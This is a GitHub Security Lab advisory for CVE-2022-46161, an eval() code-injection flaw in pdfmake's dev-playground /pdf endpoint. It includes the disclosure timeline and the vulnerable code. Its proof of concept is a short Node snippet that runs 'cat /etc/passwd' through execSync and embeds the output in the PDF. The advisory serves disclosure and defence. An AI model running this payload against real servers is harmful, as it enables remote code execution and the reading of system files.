Headline
CVE-2022-46161: GHSL-2022-068: Remote Code Execution (RCE) in PDFMake - CVE-2022-46161
pdfmake is an open source client/server side PDF printing in pure JavaScript. In versions up to and including 0.2.5 pdfmake contains an unsafe evaluation of user controlled input. Users of pdfmake are thus subject to arbitrary code execution in the context of the process running the pdfmake code. There are no known fixes for this issue. Users are advised to restrict access to trusted user input.
Coordinated Disclosure Timeline
- 2022-08-23: Report sent to liborm85 at gmail.com
- 2022-10-10: Issue opened asking for a security contact
- 2022-11-21: Deadline expired so publishing in accordance to the GitHub Security Lab disclosure policy
Summary
The dev-playground of pdfmake lacks sandboxing/sanitization of the data sent to the server (which flows to eval()).
Product
pdfmake
Tested Version
0.2.5
Details****Issue: RCE in dev-playground.js (GHSL-2022-068)
The /pdf endpoint in charge of creating a PDF from a given JS code does not sanitize user-input, nor does the execution take place in a sandboxed environment.
app.post('/pdf', function (req, res) {
eval(req.body.content);
Impact
This issue may lead to a variety of exploit primitives, including Remote Code Execution (RCE) or uncontrolled resource consumption.
Resources
- CWE-94: Improper Control of Generation of Code (‘Code Injection’)
- CWE-400: Uncontrolled Resource Consumption
POC
Providing the following snippet will cause pdfmake to dump the contents of /etc/passwd into the generated PDF doc:
const {execSync} = require('node:child_process');
var out = execSync('cat /etc/passwd');
dd = {
content: [
out.toString()
]
}
- CVE-2022-46161
Credit
This issue was discovered and reported by GHSL team member @VulnerabilityViper (Ryan Finn).
You can contact the GHSL team at [email protected], please include a reference to GHSL-2022-068 in any communication regarding this issue.